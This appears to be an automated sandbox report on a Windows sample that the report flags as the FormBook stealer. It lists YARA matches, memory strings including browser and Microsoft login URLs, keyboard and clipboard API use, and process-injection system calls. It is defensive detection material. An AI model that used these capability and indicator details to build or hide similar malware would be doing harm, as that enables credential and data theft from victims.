            Source: netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: netbtugc.exe, 00000003.00000002.4145972280.0000000004A92000.00000004.10000000.00040000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4145419530.0000000004322000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
            Source: netbtugc.exe, 00000003.00000002.4145972280.0000000004A92000.00000004.10000000.00040000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4145419530.0000000004322000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
            Source: netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: netbtugc.exe, 00000003.00000002.4143985977.00000000030C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: netbtugc.exe, 00000003.00000002.4143985977.00000000030C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: netbtugc.exe, 00000003.00000002.4143985977.00000000030C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: netbtugc.exe, 00000003.00000002.4143985977.000000000309B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033b
            Source: netbtugc.exe, 00000003.00000002.4143985977.00000000030C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: netbtugc.exe, 00000003.00000003.2008817187.0000000007DDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: netbtugc.exe, 00000003.00000002.4145972280.00000000050DA000.00000004.10000000.00040000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4145419530.000000000496A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.empowermedeco.com/fo8o/?Ml18S=mxnR
            Source: netbtugc.exe, 00000003.00000003.2014162580.0000000007DFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: netbtugc.exe, 00000003.00000002.4145972280.000000000476E000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000003.00000002.4147607697.00000000063B0000.00000004.00000800.00020000.00000000.sdmp, YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4145419530.0000000003FFE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_
            Source: YpYSxBPTXgWuOtxBGIerqOSW.exe, 00000005.00000002.4145419530.0000000003FFE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.sedo.com/services/parking.php3
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_00916B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00916B0C
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_00916D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00916D07
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_00916B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00916B0C
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_00902B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00902B37
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_0092F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0092F7FF

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1823875661.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1823341522.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4143480328.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4143880613.0000000003030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4146974677.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4144988043.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4144911596.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1824475216.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1823875661.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1823341522.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4143480328.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4143880613.0000000003030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4146974677.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4144988043.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.4144911596.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1824475216.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: This is a third-party compiled AutoIt script.0_2_008C3D19
            Source: Certificate 11-21AIS.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: Certificate 11-21AIS.exe, 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_87013e52-8
            Source: Certificate 11-21AIS.exe, 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_251a9f00-0
            Source: Certificate 11-21AIS.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7ed6aa7c-a
            Source: Certificate 11-21AIS.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_5d24bcba-1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042B363 NtClose,1_2_0042B363
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772B60 NtClose,LdrInitializeThunk,1_2_03772B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03772DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03772C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037735C0 NtCreateMutant,LdrInitializeThunk,1_2_037735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03774340 NtSetContextThread,1_2_03774340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03774650 NtSuspendThread,1_2_03774650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772BF0 NtAllocateVirtualMemory,1_2_03772BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772BE0 NtQueryValueKey,1_2_03772BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772BA0 NtEnumerateValueKey,1_2_03772BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772B80 NtQueryInformationFile,1_2_03772B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772AF0 NtWriteFile,1_2_03772AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772AD0 NtReadFile,1_2_03772AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772AB0 NtWaitForSingleObject,1_2_03772AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772F60 NtCreateProcessEx,1_2_03772F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772F30 NtCreateSection,1_2_03772F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772FE0 NtCreateFile,1_2_03772FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772FB0 NtResumeThread,1_2_03772FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772FA0 NtQuerySection,1_2_03772FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772F90 NtProtectVirtualMemory,1_2_03772F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772E30 NtWriteVirtualMemory,1_2_03772E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772EE0 NtQueueApcThread,1_2_03772EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772EA0 NtAdjustPrivilegesToken,1_2_03772EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772E80 NtReadVirtualMemory,1_2_03772E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772D30 NtUnmapViewOfSection,1_2_03772D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772D10 NtMapViewOfSection,1_2_03772D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772D00 NtSetInformationFile,1_2_03772D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772DD0 NtDelayExecution,1_2_03772DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772DB0 NtEnumerateKey,1_2_03772DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772C60 NtCreateKey,1_2_03772C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772C00 NtQueryInformationProcess,1_2_03772C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772CF0 NtOpenProcess,1_2_03772CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772CC0 NtQueryVirtualMemory,1_2_03772CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03772CA0 NtQueryInformationToken,1_2_03772CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03773010 NtOpenDirectoryObject,1_2_03773010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03773090 NtSetValueKey,1_2_03773090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037739B0 NtGetContextThread,1_2_037739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03773D70 NtOpenThread,1_2_03773D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03773D10 NtOpenProcessToken,1_2_03773D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F4340 NtSetContextThread,LdrInitializeThunk,3_2_035F4340
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F4650 NtSuspendThread,LdrInitializeThunk,3_2_035F4650
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2B60 NtClose,LdrInitializeThunk,3_2_035F2B60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_035F2BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2BE0 NtQueryValueKey,LdrInitializeThunk,3_2_035F2BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_035F2BA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2AD0 NtReadFile,LdrInitializeThunk,3_2_035F2AD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2AF0 NtWriteFile,LdrInitializeThunk,3_2_035F2AF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2F30 NtCreateSection,LdrInitializeThunk,3_2_035F2F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2FE0 NtCreateFile,LdrInitializeThunk,3_2_035F2FE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2FB0 NtResumeThread,LdrInitializeThunk,3_2_035F2FB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2EE0 NtQueueApcThread,LdrInitializeThunk,3_2_035F2EE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_035F2E80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2D10 NtMapViewOfSection,LdrInitializeThunk,3_2_035F2D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_035F2D30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2DD0 NtDelayExecution,LdrInitializeThunk,3_2_035F2DD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_035F2DF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_035F2C70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2C60 NtCreateKey,LdrInitializeThunk,3_2_035F2C60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_035F2CA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F35C0 NtCreateMutant,LdrInitializeThunk,3_2_035F35C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F39B0 NtGetContextThread,LdrInitializeThunk,3_2_035F39B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2B80 NtQueryInformationFile,3_2_035F2B80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2AB0 NtWaitForSingleObject,3_2_035F2AB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2F60 NtCreateProcessEx,3_2_035F2F60
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2F90 NtProtectVirtualMemory,3_2_035F2F90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2FA0 NtQuerySection,3_2_035F2FA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2E30 NtWriteVirtualMemory,3_2_035F2E30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2EA0 NtAdjustPrivilegesToken,3_2_035F2EA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2D00 NtSetInformationFile,3_2_035F2D00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2DB0 NtEnumerateKey,3_2_035F2DB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2C00 NtQueryInformationProcess,3_2_035F2C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2CC0 NtQueryVirtualMemory,3_2_035F2CC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F2CF0 NtOpenProcess,3_2_035F2CF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F3010 NtOpenDirectoryObject,3_2_035F3010
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F3090 NtSetValueKey,3_2_035F3090
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F3D70 NtOpenThread,3_2_035F3D70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F3D10 NtOpenProcessToken,3_2_035F3D10
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02BC7A70 NtReadFile,3_2_02BC7A70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02BC7BE0 NtClose,3_2_02BC7BE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02BC7B50 NtDeleteFile,3_2_02BC7B50
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02BC7920 NtCreateFile,3_2_02BC7920
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02BC7D30 NtAllocateVirtualMemory,3_2_02BC7D30
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_00906685: CreateFileW,DeviceIoControl,CloseHandle,0_2_00906685
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008FACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_008FACC5
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_009079D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_009079D3
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008EB0430_2_008EB043
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008D32000_2_008D3200
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008D3B700_2_008D3B70
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008F410F0_2_008F410F
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008E02A40_2_008E02A4
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008F038E0_2_008F038E
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008CE3B00_2_008CE3B0
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008E06D90_2_008E06D9
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008F467F0_2_008F467F
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_0092AACE0_2_0092AACE
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008F4BEF0_2_008F4BEF
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008ECCC10_2_008ECCC1
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008C6F070_2_008C6F07
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008CAF500_2_008CAF50
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_009231BC0_2_009231BC
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008ED1B90_2_008ED1B9
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008DB11F0_2_008DB11F
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008E123A0_2_008E123A
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008F724D0_2_008F724D
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_009013CA0_2_009013CA
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008C93F00_2_008C93F0
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008DF5630_2_008DF563
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008C96C00_2_008C96C0
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_0090B6CC0_2_0090B6CC
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008C77B00_2_008C77B0
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_0092F7FF0_2_0092F7FF
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008F79C90_2_008F79C9
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008DFA570_2_008DFA57
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008C9B600_2_008C9B60
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008C7D190_2_008C7D19
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008E9ED00_2_008E9ED0
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008DFE6F0_2_008DFE6F
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008C7FA30_2_008C7FA3
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_011B62500_2_011B6250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004168711_2_00416871
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004168731_2_00416873
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004028A01_2_004028A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004101731_2_00410173
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004011101_2_00401110
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E1F31_2_0040E1F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004012901_2_00401290
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004035001_2_00403500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040268A1_2_0040268A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004026981_2_00402698
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004026A01_2_004026A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FF4A1_2_0040FF4A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042D7531_2_0042D753
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FF531_2_0040FF53
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FA3521_2_037FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038003E61_2_038003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374E3F01_2_0374E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E02741_2_037E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C02C01_2_037C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037C81581_2_037C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038001AA1_2_038001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DA1181_2_037DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037301001_2_03730100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F81CC1_2_037F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F41A21_2_037F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D20001_2_037D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037407701_2_03740770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037647501_2_03764750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373C7C01_2_0373C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375C6E01_2_0375C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038005911_2_03800591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037405351_2_03740535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F24461_2_037F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E44201_2_037E4420
